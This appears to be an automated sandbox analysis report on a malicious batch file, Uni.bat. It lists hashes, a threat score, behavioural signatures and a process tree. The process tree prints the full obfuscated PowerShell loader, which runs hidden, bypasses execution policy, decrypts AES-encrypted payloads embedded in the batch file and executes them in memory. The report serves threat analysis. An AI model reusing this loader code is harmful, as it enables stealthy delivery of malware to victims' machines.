Analysis
-
max time kernel
119s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
30-05-2024 10:22
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win7-20240221-en
windows7-x64
5 signatures
150 seconds
General
-
Target
Uni.bat
-
Size
511KB
-
MD5
9fb9372aca1d8d842589419264c8ae62
-
SHA1
9313414673f343c9bb14939c6c14697dcdfc1aa0
-
SHA256
38defd519e3b007e7590a2dc8101f356806b1f1cdcdba3eccfa0afc46b2f8577
-
SHA512
10b935a27946dd4e4ff22b42782e141d22471f90fe086c6874e783a341066f0b54be8fdcbc7c7df21d96565ed0d7b00afd91bd59ac8c37613579decb0fb84618
-
SSDEEP
12288:/JXwTLWKJYuv1T5jgKND/v+Tz5Wgv2qwAbMdusp/cq:/JKj5jgKdW5WgOqwAYxh
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 2824 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2824 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2824 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 2504 wrote to memory of 2824 2504 cmd.exe powershell.exe PID 2504 wrote to memory of 2824 2504 cmd.exe powershell.exe PID 2504 wrote to memory of 2824 2504 cmd.exe powershell.exe PID 2504 wrote to memory of 2824 2504 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1tEGKi4VytwOkTEJ8mQKeyciBUGLe1meEjQfMLUYBak='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7rtamVIQAKNy+6k+WiT3+Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ukQvk=New-Object System.IO.MemoryStream(,$param_var); $BXroT=New-Object System.IO.MemoryStream; $hmuUD=New-Object System.IO.Compression.GZipStream($ukQvk, [IO.Compression.CompressionMode]::Decompress); $hmuUD.CopyTo($BXroT); $hmuUD.Dispose(); $ukQvk.Dispose(); $BXroT.Dispose(); $BXroT.ToArray();}function execute_function($param_var,$param2_var){ $ZKofb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $shval=$ZKofb.EntryPoint; $shval.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$imIdF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($mdSzT in $imIdF) { if ($mdSzT.StartsWith(':: ')) { $Ijxic=$mdSzT.Substring(3); break; }}$payloads_var=[string[]]$Ijxic.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824
-